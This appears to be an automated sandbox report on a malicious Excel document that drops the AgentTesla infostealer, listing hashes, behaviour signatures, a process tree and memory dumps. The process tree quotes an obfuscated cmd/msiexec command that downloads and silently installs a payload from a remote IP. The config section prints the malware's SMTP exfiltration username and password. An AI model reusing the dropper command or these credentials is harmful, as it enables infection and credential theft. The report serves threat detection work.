Analysis
- Max time kernel: 144s
- Max time network: 85s
- Platform: windows7_x64
- Resource: win7v200430
- Submitted: 30-06-2020 12:08

Tasks
- Static task: static1
- Behavioral task: behavioral1 (sample 11203780.xls, resource win7v200430)
- Behavioral task: behavioral2 (sample 11203780.xls, resource win10)
General
- Target: 11203780.xls
- Size: 172KB
- MD5: 14b2d3f08ad6543c060d19748f526167
- SHA1: b10646324228a4b21154ef6e7d9d5469a61364e7
- SHA256: 7c3822b0015e740bb3e9a1c4d0d5da368cae8117a820152377d41de49ff3ca36
- SHA512: e800b1d0531a7e5931d6ad9e1cd48003e80d0f366e62f55e6dd17de5613bed9bd431ee40d0baa42e51389d30c1d9509a83e6878faa11f11d8e5745725035766b
Malware Config
Extracted family: agenttesla
- Protocol: smtp
- Host: smtp.yandex.com
- Port: 587
- Username: pagejeffrey@yandex.com
- Password: $44#@weC0*
Signatures
- AgentTesla
  Agent Tesla is a remote access tool (RAT) written in Visual Basic.
- Process spawned unexpected child process (1 IoC)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes:
  - Parent C:\Program Files\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process: process cmd.exe (PID 1020), target process EXCEL.EXE (PID 1092)
- AgentTesla Payload (4 IoCs)
  Resources matching yara rule family_agenttesla:
  - behavioral1/memory/1172-17-0x0000000000400000-0x000000000044C000-memory.dmp
  - behavioral1/memory/1172-18-0x0000000000446ADE-mapping.dmp
  - behavioral1/memory/1172-20-0x0000000000400000-0x000000000044C000-memory.dmp
  - behavioral1/memory/1172-21-0x0000000000400000-0x000000000044C000-memory.dmp
- Blocklisted process makes network request (1 IoC)
  Processes:
  - flow 3: msiexec.exe (PID 1044)
- Executes dropped EXE (3 IoCs)
  Processes:
  - MSICA82.tmp (PID 1768)
  - MSICA82.tmp (PID 1180)
  - MSICA82.tmp (PID 1172)
- Reads data files stored by FTP clients (2 TTPs)
  Tries to access configuration files associated with programs like FileZilla.
- Reads user/profile data of local email clients (2 TTPs)
  Email clients store some user data on disk where infostealers will often target it.
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Use of msiexec (install) with remote resource (1 IoC)
  Processes:
  - msiexec.exe (PID 108)
- Enumerates connected drives (3 TTPs, 24 IoCs)
  Attempts to read the root path of hard drives other than the default C: drive.
  Processes:
  - msiexec.exe opened (read-only): \??\A:, \??\H:, \??\I:, \??\P:, \??\U:, \??\W:, \??\X:, \??\E:, \??\J:, \??\M:, \??\T:, \??\V:, \??\Z:, \??\Y:, \??\F:, \??\G:, \??\K:, \??\L:, \??\N:, \??\Q:, \??\S:, \??\B:, \??\O:, \??\R:
- Suspicious use of SetThreadContext (1 IoC)
  Processes:
  - MSICA82.tmp (PID 1768) set thread context of MSICA82.tmp (PID 1172)
- Drops file in Windows directory (6 IoCs)
  Processes (msiexec.exe):
  - File opened for modification: C:\Windows\Installer\
  - File opened for modification: C:\Windows\Installer\MSICA32.tmp
  - File opened for modification: C:\Windows\Installer\MSICA82.tmp
  - File opened for modification: C:\Windows\Installer\1c81f.ipi
  - File opened for modification: C:\Windows\Installer\MSIC495.tmp
  - File created: C:\Windows\Installer\1c81f.ipi
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Office loads VBA resources, possible macro or embedded object present
- Creates scheduled task(s) (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
- Modifies data under HKEY_USERS (1 IoC)
  Processes:
  - Key created by msiexec.exe: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad
- Suspicious behavior: AddClipboardFormatListener (1 IoC)
  Processes:
  - EXCEL.EXE (PID 1092)
- Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
  Processes:
  - msiexec.exe (PID 108)
- Suspicious behavior: EnumeratesProcesses (7 IoCs)
  Processes:
  - msiexec.exe (PID 1044), 2 events
  - MSICA82.tmp (PID 1768), 3 events
  - MSICA82.tmp (PID 1172), 2 events
- Suspicious use of AdjustPrivilegeToken (48 IoCs)
  Processes (token privileges adjusted, grouped by process):
  - msiexec.exe (PID 108), 31 events: SeShutdownPrivilege, SeIncreaseQuotaPrivilege, SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege, SeLockMemoryPrivilege, SeIncreaseQuotaPrivilege, SeMachineAccountPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeSyncAgentPrivilege, SeEnableDelegationPrivilege, SeManageVolumePrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
  - msiexec.exe (PID 1044), 15 events: SeRestorePrivilege (7 times), SeTakeOwnershipPrivilege (7 times), SeSecurityPrivilege (once)
  - MSICA82.tmp (PID 1768), 1 event: SeDebugPrivilege
  - MSICA82.tmp (PID 1172), 1 event: SeDebugPrivilege
- Suspicious use of SetWindowsHookEx (4 IoCs)
  Processes:
  - EXCEL.EXE (PID 1092), 3 events
  - MSICA82.tmp (PID 1172), 1 event
- Suspicious use of WriteProcessMemory (29 IoCs)
  Processes (writer -> target):
  - EXCEL.EXE (PID 1092) wrote to memory of cmd.exe (PID 1020), 3 events
  - cmd.exe (PID 1020) wrote to memory of msiexec.exe (PID 108), 5 events
  - msiexec.exe (PID 1044) wrote to memory of MSICA82.tmp (PID 1768), 4 events
  - MSICA82.tmp (PID 1768) wrote to memory of schtasks.exe (PID 1972), 4 events
  - MSICA82.tmp (PID 1768) wrote to memory of MSICA82.tmp (PID 1180), 4 events
  - MSICA82.tmp (PID 1768) wrote to memory of MSICA82.tmp (PID 1172), 9 events
Processes
(process tree; nesting shows parent/child relationship)
- C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
  Command line: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\11203780.xls
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /c ms^iE^x^ec /i http://199.195.250.60/gg/11203780.msi /qn
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\msiexec.exe
      Command line: msiExec /i http://199.195.250.60/gg/11203780.msi /qn
      - Use of msiexec (install) with remote resource
      - Suspicious behavior: CmdExeWriteProcessMemorySpam
      - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\msiexec.exe
  Command line: C:\Windows\system32\msiexec.exe /V
  - Blocklisted process makes network request
  - Enumerates connected drives
  - Drops file in Windows directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - C:\Windows\Installer\MSICA82.tmp
    Command line: "C:\Windows\Installer\MSICA82.tmp"
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\schtasks.exe
      Command line: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QzxxmSogFmAhK" /XML "C:\Users\Admin\AppData\Local\Temp\tmp699B.tmp"
      - Creates scheduled task(s)
    - C:\Windows\Installer\MSICA82.tmp
      Command line: "{path}"
      - Executes dropped EXE
    - C:\Windows\Installer\MSICA82.tmp
      Command line: "{path}"
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of SetWindowsHookEx
Downloads
- C:\Users\Admin\AppData\Local\Temp\tmp699B.tmp
  - MD5: b3f0284daaab917a86328b3339b8b463
  - SHA1: a0593855a2eb96b0378c77e66e9ba345837f67fa
  - SHA256: 8fd32cc48b0336567a0469b4f2ba7e136ef78b59c322e15eace1004ea34cbabb
  - SHA512: a740035edf3aea2b52f2b1577e548a0fe7ff1bbc651166967b7eff3ce9d1f728cb92a168ae65787a6e40daaa5a4917e09cc5f7cd0f9dd8da3a7e9952171732e2
- C:\Windows\Installer\MSICA82.tmp
  - MD5: 42013c93a1711781565cb1373a43f971
  - SHA1: 15a6ee651a4d11d55c2c130295c0f53741a2be62
  - SHA256: dcbaf7178636323a226f048b4c8f64510b5b36fbfebcdf56df543eba07bc3bd1
  - SHA512: 3b16826760380fd0cf10cd85d5cf9ded4c504e5bc9c8932e09ce88c02cc2dadf80d7198f14ff8f1dfdd52ab78a26ca7eca0c664f47ef8e790ae04cff0baf4bd9
Memory dumps
- memory/108-26-0x00000000023B0000-0x00000000023B4000-memory.dmp (16KB)
- memory/108-4-0x0000000000000000-mapping.dmp
- memory/1020-3-0x0000000000000000-mapping.dmp
- memory/1044-6-0x0000000000F80000-0x0000000000F84000-memory.dmp (16KB)
- memory/1044-7-0x0000000000F80000-0x0000000000F84000-memory.dmp (16KB)
- memory/1044-5-0x0000000001D80000-0x0000000001D84000-memory.dmp (16KB)
- memory/1044-25-0x0000000002550000-0x0000000002554000-memory.dmp (16KB)
- memory/1044-24-0x0000000000F80000-0x0000000000F84000-memory.dmp (16KB)
- memory/1044-22-0x0000000002550000-0x0000000002554000-memory.dmp (16KB)
- memory/1092-2-0x0000000006140000-0x0000000006240000-memory.dmp (1024KB)
- memory/1092-1-0x0000000006140000-0x0000000006240000-memory.dmp (1024KB)
- memory/1092-0-0x0000000006140000-0x0000000006240000-memory.dmp (1024KB)
- memory/1172-20-0x0000000000400000-0x000000000044C000-memory.dmp (304KB)
- memory/1172-18-0x0000000000446ADE-mapping.dmp
- memory/1172-21-0x0000000000400000-0x000000000044C000-memory.dmp (304KB)
- memory/1172-17-0x0000000000400000-0x000000000044C000-memory.dmp (304KB)
- memory/1768-13-0x0000000000000000-0x0000000000000000-disk.dmp
- memory/1768-9-0x0000000000000000-mapping.dmp
- memory/1972-14-0x0000000000000000-mapping.dmp